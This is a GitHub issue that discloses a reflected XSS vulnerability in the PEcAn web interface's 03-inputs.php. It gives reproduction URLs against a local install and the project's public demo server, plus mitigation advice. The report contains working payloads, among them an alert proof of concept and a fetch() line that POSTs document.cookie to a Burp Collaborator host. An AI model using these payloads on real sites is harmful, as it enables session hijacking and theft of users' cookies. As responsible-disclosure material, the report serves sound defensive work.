Reflected XSS on 03-inputs.php file #3400
Comments
|
Hello @Sweetdevil144 @robkooper I wanted to double check on this as we are close to 90 days and I would like to work with you guys on this finding. Let me know if you need any more information from my side! |
|
Looking quickly, the problem is at https://github.com/PecanProject/pecan/blob/develop/web/common.php#L53 and we need to add some sanitizing code here. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Bug Description
An unauthenticated user can access the 03-inputs.php and execute a reflected XSS on the site with the payload:
"3cck"><script>alert(1)<%2fscript>zqqf2jvbenj" in the URL parameters: hostname, sitegroupid, lat, lon, and sitename.
To Reproduce
I am hosting on a fresh install through docker. To repeat the steps, go to your pecan.localhost server and paste this path:
http://pecan.localhost/pecan/03-inputs.php?offline=offline&hostname=docker&modelid=99000000003&sitegroupid=1&lat=&lon=&siteid=622&sitename=3cck%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Ezqqf2jvbenj
I was also able to exploit this on your demo at:
http://pecan.ncsa.illinois.edu/pecan/03-inputs.php?offline=offline&hostname=docker&modelid=5000000259&sitegroupid=1&lat=&lon=&siteid=622&sitename=3cck%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Ezqqf2jvbenj
Further description
The vulnerability occurs when unsanitized input from the user is reflected back on the page without proper validation or escaping. This allows an attacker to inject malicious JavaScript code into the application, which will be executed in the context of the victim's browser.
Screenshots
XSS Execution at pecan.ncsa.illinois.edu
XSS Execution on localhost:
Source code of site with injected values:
In addition to executing JavaScript I can also craft the XSS to steal a users cookie and their session. If I send a payload like so:
http://pecan.localhost/pecan/03-inputs.php?offline=offline&hostname=docker&modelid=99000000003&sitegroupid=1&lat=&lon=&siteid=622&sitename=3cck%22%3e%3cscript%3efetch(%27https%3a%2f%2f4v0ed43gg2vq3ckagbmyfdbpigo7cy0n.oastify.com%27%2c%20%7bmethod%3a%20%27POST%27%2cmode%3a%20%27no-cors%27%2cbody%3adocument.cookie%7d)%3b%3c%2fscript%3ezqqf2jvbenj
My payload is this in the sitename parameter:
When I poll my collaborator in burp suite I get the users cookie information returned to me.
Mitigation:
HttpOnly Flag for Cookies: Ensure sensitive cookies (e.g., session IDs) are marked as HttpOnly so they cannot be accessed via JavaScript.
Content Security Policy (CSP): A properly configured CSP can help mitigate the risk of XSS attacks by restricting where scripts can be loaded from.
Input Sanitization & Output Encoding: Always sanitize user input and properly encode output to prevent malicious JavaScript from being executed in the browser.
In addition to above you can review more about XSS here: https://portswigger.net/web-security/cross-site-scripting/reflected
In addition, guidance for fixing them here: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
The text was updated successfully, but these errors were encountered: